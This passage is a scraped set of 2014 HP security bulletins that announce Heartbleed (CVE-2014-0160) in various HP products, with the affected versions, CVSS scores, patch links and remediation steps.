https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04263236\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHP System Management Homepage (SMH)\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nWMI Mapper for HP Systems Insight Manager\r\n HPSBMU03013\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04260385\r\n\r\nHP Version Control Agent (VCA) and Version Control Repository Manager (VCRM)\r\non Linux and Windows,\r\n HPSBMU03020\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04262472\r\n\r\nHP Insight Control server migration software components\r\n HPSBMU03029\r\n 
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04268240\r\n\r\nHP Insight Control server deployment\r\n HPSBMU03024\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04267749\r\n\r\nHP Onboard Administrator (OA)\r\n HPSBMU02994\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04236062\r\n\r\nHP Virtual Connect Firmware Smart Components Installer Software\r\n HPSBMU03032\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04272594\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhgkMACgkQ4B86/C0qfVk4uQCdF+q0r5FULEhsxi1b0Io6aYAq\r\n7JMAoIbGBlJ/tgvkIXGEklbniV3Gy/SC\r\n=O4Az\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03028 rev.1 - HP Matrix Operating Environment and CloudSystem Matrix Software Components running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30520", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30520", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04262472\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04262472\r\nVersion: 2\r\n\r\nHPSBMU03020 rev.2 - HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM) running OpenSSL on Linux and Windows, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-24\r\nLast Updated: 2014-04-29\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Version\r\nControl Agent (VCA) and Version Control Repository Manager (VCRM) running\r\nOpenSSL on Linux and Windows. 
This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101531\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for HP Version Control\r\nAgent (VCA) and Version Control Repository Manager (VCRM).\r\n\r\nNote: OpenSSL has been updated 1.0.1g in these updates.\r\n\r\nProduct version/Platform\r\n Download Location (Web or FTP)\r\n\r\nHP Version Control Agent v7.3.2 for Windows x86\r\n\r\nhttp://www.hp.com/swpublishing/MTX-5d66a09b2e6a490e9a61950f21\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p639883427/v97218\r\n\r\nHP Version Control Agent v7.3.2 for Windows x64\r\n\r\nhttp://www.hp.com/swpublishing/MTX-bd3ae96c013346078625d38398\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p519919823/v97223\r\n\r\nHP Version Control Agent v7.3.2 for Linux\r\n\r\nhttp://www.hp.com/swpublishing/MTX-d517a8466f6341d38519b5277b\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1174025843/v97276\r\n\r\nHP Version Control Repository Manager v7.3.2\r\n\r\nhttp://www.hp.com/swpublishing/MTX-5ee056c2b13449e8b7153e21a1\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p283849675/v97269\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 
2014 Initial release\r\nVersion:2 (rev.2) - 29 April 2014 Added Software update information\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. 
To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNfxzMACgkQ4B86/C0qfVnxzgCfYGUWPnj9fMIXFN3Tt1d05Yhw\r\n9koAoN6wTZ3HPpXfoJnXOJwBa+A563SI\r\n=mvDg\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03020 rev.2 - HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30496", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30496", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04273303\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04273303\r\nVersion: 1\r\n\r\nHPSBST03027 rev.1 - HP StoreVirtual 4000 Storage and HP P4000 G2 Storage\r\nusing HP System Management Homepage (SMH) 
running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-02\r\nLast Updated: 2014-05-02\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreVirtual\r\n4000 Storage and HP P4000 G2 Storage using HP System Management Homepage\r\n(SMH) running OpenSSL. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101537\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP LeftHand OS version 11.0 for HP StoreVirtual 4000 Storage and HP P4000 G2\r\nStorage using HP System Management Homepage (SMH)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software patch available to resolve the\r\nvulnerability.\r\n\r\nPatch 40013 available through StoreVirtual Online Upgrades.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 2 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNjw0wACgkQ4B86/C0qfVkWrwCfXSXJVoS7rYwbspA/RHS30xWD\r\njQ8AoM9G/iNI3DRmJS+MS9iIq64WRTG+\r\n=2stF\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBST03027 rev.1 - HP StoreVirtual 4000 Storage and HP P4000 G2 Storage using HP System Management Homepage (SMH) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30530", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30530", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239374\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239374\r\nVersion: 1\r\n\r\nHPSBMU02999 rev.1 - HP Software Autonomy WorkSite Server (On-Premises\r\nSoftware), Running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of Information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential vulnerability exists in HP Autonomy WorkSite Server (on-premises\r\nsoftware) running OpenSSL. 
The vulnerability can be exploited to allow remote\r\ndisclosure of information.\r\n\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences:\r\nCVE-2014-0160 (SSRT101505)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Autonomy WorkSite Server v9.0 SP1 (on-premises software)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided an update to HP Autonomy WorkSite Server v9.0 SP1\r\n(on-premises software) that will address the OpenSSL vulnerability. 
https://w\r\norksitesupport.autonomy.com/worksite/Scripts/GetDoc.aspx?latest=0%26nrtid=!nr\r\ntdms:0:!session:10.253.1.101:!database:SUPPORT:!document:1351832,1\r\n\r\nNote: after applying the update, HP recommends these additional steps to\r\nassure the vulnerability is addressed.\r\n\r\nRevoke old key pairs that were just superseded\r\nChange all potentially affected passwords\r\nInvalidate all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within HP\r\nAutonomy WorkSite Server (on-premises Software). The bulletin does not apply\r\nto any other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNn1wACgkQ4B86/C0qfVm/sQCg+dFq6zytvlfYlmexvErif+Bg\r\nZooAnRDUeVqwXlt8KEGyQrnGheC43CH0\r\n=6WRm\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBMU02999 rev.1 - HP Software Autonomy WorkSite Server (On-Premises Software), Running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30480", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30480", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04249113\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04249113\r\nVersion: 2\r\n\r\nHPSBMU03009 rev.2 - HP CloudSystem Foundation and Enterprise Software v8.0\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-05-01\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe "Heartbleed" vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the "Heartbleed" 
vulnerability.\r\n\r\nNOTE: The "Heartbleed" vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160, (SSRT101520)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP CloudSystem Foundation and Enterprise version 8.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability by issuing an update to the CloudSystem\r\nproduct download files. A new version of the CloudSystem Foundation component\r\nis provided, specified as version 8.01. All other CloudSystem download files\r\nremain at version 8.0. The combination of these files available at the link\r\nbelow make up the overall CloudSystem solution.\r\nThe Software Depot download location for CloudSystem Foundation and\r\nEnterprise update is:\r\n\r\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\r\n=Z7550-63210\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 April 2014 Initial release\r\nVersion:2 (rev.2) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhmpcACgkQ4B86/C0qfVk78QCg0vzPtB9E34/a5rhQ274UoqYS\r\nKJgAn3mXIarK3gINzgPWgbob0u5+kNnP\r\n=0lrM\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03009 rev.2 - HP CloudSystem Foundation and Enterprise Software v8.0 running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30526", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30526", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nDocument ID: c04260456\r\nVersion: 2\r\n\r\nHPSBMU03017 rev.2 - HP Software Connect-IT running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software\r\nConnect-IT running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. 
This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101528)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Connect-IT 9.52 (including all patches), 9.53 (including all patches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for HP Software\r\nConnect-IT:\r\n\r\nHP Software Connect-IT for Windows:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/LID/HPCIT_00068\r\n\r\nHP Software Connect-IT for Linux:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/LID/HPCIT_00069\r\n\r\nHP recommends following Connect-IT guidelines including the following action\r\nitems:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. 
